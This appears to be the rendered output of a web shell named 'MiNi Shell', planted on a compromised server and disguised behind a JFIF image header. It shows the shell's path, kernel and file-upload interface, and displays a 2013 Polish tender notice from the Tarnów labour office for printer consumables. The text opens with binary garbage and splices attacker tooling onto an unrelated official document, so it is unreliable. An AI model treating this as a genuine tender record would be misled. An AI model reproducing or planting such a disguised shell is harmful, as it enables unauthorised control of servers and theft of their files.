JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130522/199636-N-2013.html

<p class="kh_header"><b>Tarnów: Przedmiotem zamówienia jest dostawa - do siedziby Zamawiającego - fabrycznie nowych materiałów eksploatacyjnych do drukarek komputerowych i urządzeń wielofunkcyjnych oraz akcesoriów komputerowych</b><br>
<b>Numer ogłoszenia: 199636 - 2013; data zamieszczenia: 22.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Tarnowie , pl. J. Bema 3, 33-100 Tarnów, woj. małopolskie, tel. 014 6882300, faks 014 6882301.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.up.tarnow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest dostawa - do siedziby Zamawiającego - fabrycznie nowych materiałów eksploatacyjnych do drukarek komputerowych i urządzeń wielofunkcyjnych oraz akcesoriów komputerowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa - do siedziby Zamawiającego - fabrycznie nowych materiałów eksploatacyjnych do drukarek komputerowych i urządzeń wielofunkcyjnych oraz akcesoriów komputerowych wg zestawienia zawartego w załączniku nr 1 
do niniejszej SIWZ . Zamawiający informuje, że dopuszcza składanie ofert na materiały eksploatacyjne oraz akcesoria komputerowe jakościowo równoważne, spełniające równoważne parametry.
Pod pojęciem fabrycznie nowe Zamawiający rozumie produkty wykonane z nowych elementów, bez śladów uszkodzenia i użytkowania, nie regenerowane ani nie refabrykowane, w oryginalnych opakowaniach producenta z widocznym logo, symbolem produktu i terminem przydatności do użytku.
Przez produkt równoważny Zamawiający rozumie produkt kompatybilny 
ze sprzętem, do którego jest zamówiony, o parametrach takich samych lub lepszych (pojemność tuszu/tonera, wydajność i jakość wydruku) w stosunku do oryginału produkowanego przez producenta urządzenia. Oferowane równoważne materiały nie mogą powodować ograniczeń funkcji i możliwości sprzętu oraz zaniżać jakości wydruku oferowanych w warunkach technicznych producenta sprzętu (pełna kompatybilność 
z oprogramowaniem sprzętu: informowanie o liczbie wydrukowanych stron, poziomie zużycia tonera, tuszu, głowicy - jeśli sprzęt posiada takie możliwości). 
Na potwierdzenie, że produkty równoważne odpowiadają wymaganiom określonym przez Zmawiającego należy:
1)	podać nazwę producenta oferowanego wkładu i markę pod jaką go dystrybuuje, 
2)	złożyć  certyfikat ISO 9001 lub równoważny dla producenta wkładu (tonera, tuszu, taśmy)  dotyczący procesu produkcji oferowanego wkładu 
3)	certyfikat ISO 14001 lub równoważny, dla producenta wkładu (tonera, tuszu, taśm) wykazanego w formularzu ofertowym (załącznik nr 2), dotyczący zarządzania środowiskowego przy procesie produkcji oferowanego wkładu,
4)	raporty z testów potwierdzające, że podana wydajność jest wynikiem przeprowadzenia testów zgodnie z normami: ISO/IEC 19752, ISO/IEC 19798, ISO/IEC 24711 lub równoważnymi oraz wydruki (np. ze strony internetowej) lub katalogu producenta, z opisem parametrów technicznych, funkcjonalnych 
i użytkowych. 
Raporty i aktualne wydruki muszą być oznaczone numerami odpowiadającymi liczbie porządkowej pozycji towarów z załącznika nr 2 do niniejszej SIWZ.
2.	Materiały eksploatacyjne oraz akcesoria komputerowe nie mogą być wyprodukowane wcześniej niż 6 miesięcy przed datą dostawy.
3.	Wymagania stawiane Wykonawcy:
1)	Wykonawca gwarantuje, że dostarczone tonery i wkłady drukujące będą wysokiej jakości oraz zapewniają kompatybilność pracy z urządzeniami Zamawiającego, zapewniają należyte bezpieczeństwo oraz posiadają właściwe opakowanie 
i oznakowanie.
2)	Wykonawca gwarantuje, że zamontowanie i użytkowanie dostarczonych przez niego tonerów i wkładów drukujących nie spowoduje utraty praw gwarancji producenta danego urządzenia, do którego są przeznaczone.
3)	W przypadku ujawnienia wad jakościowych po dokonaniu odbioru przedmiotu umowy, Wykonawca zobowiązany będzie do wymiany dostarczonych materiałów na wolne od wad, na własny koszt, niezwłocznie, nie później niż w terminie 5 dni roboczych od daty zgłoszenia wad (pocztą elektroniczną lub faksem).
4)	Wykonawca zobowiązuje się do:
a)	udzielenia 12-miesięcznej gwarancji na dostarczone materiały eksploatacyjne licząc od daty dostawy  lub gwarancji do wyczerpania środka barwiącego,
b)	pokrycia kosztów naprawy drukarki lub innego urządzenia, gdy uszkodzenie powstało w wyniku stosowania materiałów równoważnych dostarczonych przez Wykonawcę. 
Za podstawę żądania przez Zamawiającego naprawy drukarki (włączając w to wymianę bębna lub głowicy) uważa się pisemną opinię autoryzowanego serwisu producenta drukarki. Naprawa drukarki wykonana zostanie w autoryzowanym serwisie producenta drukarki w ciągu 5 dni od daty  zgłoszenia (faksem lub pocztą elektroniczną) Wykonawcy przez Zamawiającego konieczności dokonania naprawy.
5)	Dostarczone materiały eksploatacyjne muszą posiadać na opakowaniach zewnętrznych kodem producenta, nazwę (typ, symbol) materiału, opis zawartości, termin przydatności do użycia oraz wskazanie typów urządzeń, z którymi są kompatybilne.
6)	Ilości wskazane w załączniku nr 1 do niniejszej SIWZ są wielkościami orientacyjnymi, przyjętymi dla celów porównania ofert i wyboru najkorzystniejszej oferty. Wykonawcy, z którym Zamawiający zawrze umowę nie przysługuje roszczenie o realizację dostawy w wielkościach podanych w   załączniku nr 1. Jednocześnie Zamawiający gwarantuje, że zrealizuje minimum 70% zamówienia.
7)	Materiały eksploatacyjne będą dostarczane partiami, stosownie do potrzeb Zamawiającego w okresie: od daty zawarcia  umowy do 16 grudnia 2013 r.
8)	Wielkość każdej dostarczanej partii materiałów eksploatacyjnych będzie wynikać 
z dyspozycji Zamawiającego przesłanej pocztą elektroniczną lub faksem.
9)	Wykonawca dostarczy zamówione materiały eksploatacyjne do siedziby Zamawiającego swoim transportem, w ciągu 3 dni roboczych od daty przekazania dyspozycji, w godzinach pracy Zamawiającego, tj. w poniedziałki - w godzinach 
od 8:00 do 16:00, od wtorku do piątku - w godzinach od 7:30 do 15:30.

4.	Nazwy i kody dotyczące przedmiotu Zamówienia określone we Wspólnym Słowniku Zamówień Publicznych (CPV):
	30125110-5 - Toner do drukarek laserowych.
	30192113-6 - Wkłady drukujące.
1.Materiały eksploatacyjne: 1.1.Taśma do drukarki igłowej EPSON LQ2170 (S015086)	czarny 15 szt. 1.2.Taśma do drukarki igłowej OKI 3320	(09002303)	czarny	50szt.
1.3.		Taśma do drukarki igłowej OKI 4410 	(40629303)	czarny	10 szt.
1.4.		Taśma barwiąca do drukarki ArgoxA-200 55x74mm		czarny	1 szt.
1.5.		Toner do drukarki HP 5200 	(Q7516A)	czarny	1 szt.
1.6.		Toner do drukarki HP CP 4025 	(CE260A)	czarny	16 szt.
1.7.		Toner do drukarki HP CP 4025 	(CE261A)	niebieski	5 szt.
1.8.		Toner do drukarki HP CP 4025 	(CE262A)	żółty	5 szt.
1.9.		Toner do drukarki HP CP 4025 	(CE263A) 	czerwony	5 szt.
1.10.		Toner HP LJ 400 MFP 425dn 	(CF280X)	czarny	20 szt.
1.11.		Toner do drukarki HP 3600 	(Q6470A)	czarny	16 szt.
1.12.		Toner do drukarki HP 3600 	(Q6471A)	niebieski	10 szt.
1.13.		Toner do drukarki HP 3600 	(Q6472A)	żółty	10 szt.
1.14.		Toner do drukarki HP 3600 	(Q6473A)	czerwony	10 szt.
1.15.		Toner do drukarki HP 3030 	(Q2612AD)	czarny	12 szt.
1.16.		Toner do drukarki HP 2015 	(Q7553X)	czarny	35 szt.
1.17.		Toner do drukarki HP 1320 	(Q5949X)	czarny	10 szt.
1.18.		Toner do drukarki SAMSUNG 4551 	(ML-D4550B)	czarny	10 szt.
1.19.		Toner do drukarki SAMSUNG 770ND 	(CLT-K6092S)	czarny	12 szt.
1.20.		Toner do drukarki SAMSUNG 770ND 	(CLT-M6092S)	czerwony	3 szt.
1.21.		Toner do drukarki SAMSUNG 770ND 	(CLT-C6092S)	niebieski	3 szt.
1.22.		Toner do drukarki SAMSUNG 770ND 	(CLT-Y6092S)	żółty	3 szt.
1.23.		Toner do drukarki OKI 6200 	(9004078)	czarny	5 szt.
1.24.		Toner do drukarki OKI 6500 	(09004462)	czarny	10 szt.
1.25.		Toner do drukarki OKI 2540 	(09004391)	czarny	20 szt.
1.26.		Toner do drukarki Lexmark  T654 	(T650H31E)	czarny	5 szt.
1.27.		Toner do drukarki KYOCERA 	(FS1116 TK-110)	czarny	3 szt.
1.28.		Tusz do drukarki HP K8600 	(Nr 88XL C9396AE)	czarny	2 szt.
1.29.		Tusz do drukarki HP K8600 	(Nr 88XL C9393AE)	żółty	2 szt.
1.30.		Tusz do drukarki HP K8600 	(Nr 88XL C9391AE)	niebieski	2 szt.
1.31.		Tusz do drukarki HP K8600  	(Nr 88XL C9392AE)	czerwony	2 szt.
1.32.		Tusz do drukarki HP 470WBT 	(Nr 337 C9364EE)	czarny	5 szt.
1.33.		Tusz do drukarki HP 470WBT 	(Nr 343 C8766EE)	kolor	2 szt.
1.34.		Tusz do drukarki HP Bussines InkJet 2800 	(Nr 10  C4844AE)	czarny	5 szt.
1.35.		Tusz do drukarki HP Bussines InkJet 2800 	(Nr 11  C4838AE) 	żółty	2 szt.
1.36.		Tusz do drukarki HP Bussines InkJet 2800 	(Nr 11 C4836AE)	niebieski	2 szt.
1.37.		Tusz do drukarki HP Bussines InkJet 2800 	(Nr 11 C4837AE) 	czerwony	2 szt.
2.		Akcesoria komputerowe i inne			
2.1.		BD-R Double Layer DL 50GB x 6			20 szt.
2.2.		BD-R 25GB x 6			50 szt.
2.3.		CD-R 700MB x 52  light scribe 			100 szt.
2.4.		Kaseta wielokrotnego zapisu LTO3 Ultrium, 800GB w kompresji 2:1			15 szt.
2.5.		Taśma czyszcząca LTO Ultrium Universal Cleaning Cartridge	(C7978A)
	1
2.6.		Pendrive USB 3.0, 16GB, odczyt >=70MB/s  zapis >=30MB/s (USB 2.0, 3.0)			15 szt.
2.7.		Pianka do plastiku 400 ml			10 szt.
2.8.		Sprężone powietrze 400 ml			30 szt.
2.9.		Płyn do czyszczenia LCD 250ml			10 szt.
2.10.		Chusteczki nasycone do LCD/TFT 100szt			25 szt.
2.11.		Akumulatorki Ni-MH,  R03 AAA, min. 800mAh 
		40 szt.
2.12.		Akumulatorki Ni-MH,  R6 AA,  min. 2000mAh 			40 szt.
2.13.		Podkładka pod mysz laserową wym. min 220 x 180 x 0,3 mm. czarna antypoślizgowa			20 szt.	


* Ilości wskazane w tabeli są wielkościami orientacyjnymi ustalonymi na podstawie zużycia przez okres ostatnich 12 miesięcy oraz przewidywanego zapotrzebowania, przyjętymi w celu porównania ofert i wyboru najkorzystniejszej oferty. Wykonawcy nie przysługuje roszczenie o realizację dostawy w wielkościach podanych w niniejszej tabeli. Jednocześnie Zamawiający gwarantuje, że zrealizuje minimalna 70%  zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.19.21.13-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania tego warunku Wykonawca musi posiadać doświadczenie polegające na wykonaniu w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy,  - w tym okresie, co najmniej trzech dostaw materiałów eksploatacyjnych o wartości minimum 90 000,00 zł każda</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W przypadku oferowania produktów równoważnych na potwierdzenie, że produkty równoważne odpowiadają wymaganiom określonym przez Zmawiającego należy:
1)	złożyć  certyfikat ISO 9001 lub równoważny dla producenta wkładu (tonera, tuszu, taśmy)  dotyczący procesu produkcji oferowanego wkładu 
2)	certyfikat ISO 14001 lub równoważny, dla producenta wkładu (tonera, tuszu, taśm) wykazanego w formularzu ofertowym (załącznik nr 2), dotyczący zarządzania środowiskowego przy procesie produkcji oferowanego wkładu,
3)	raporty z testów potwierdzające, że podana wydajność jest wynikiem przeprowadzenia testów zgodnie z normami: ISO/IEC 19752, ISO/IEC 19798, ISO/IEC 24711 lub równoważnymi oraz wydruki (np. ze strony internetowej) lub katalogu producenta, z opisem parametrów technicznych, funkcjonalnych 
i użytkowych</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony formularz ofertowy- załącznik nr 2,
2.	Podpisany projekt umowy - załącznik nr 5,
3.	Oświadczenie dotyczące powierzenia części zamówienia podwykonawcom - załącznik  nr 7</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.up.tarnow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Tarnowie, pl.gen. J. Bema 3, 33-100 Tarnów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2013 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Tarnowie, pl.gen. J. Bema 3, 33-100 Tarnów, sekretariat (pok. 214).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com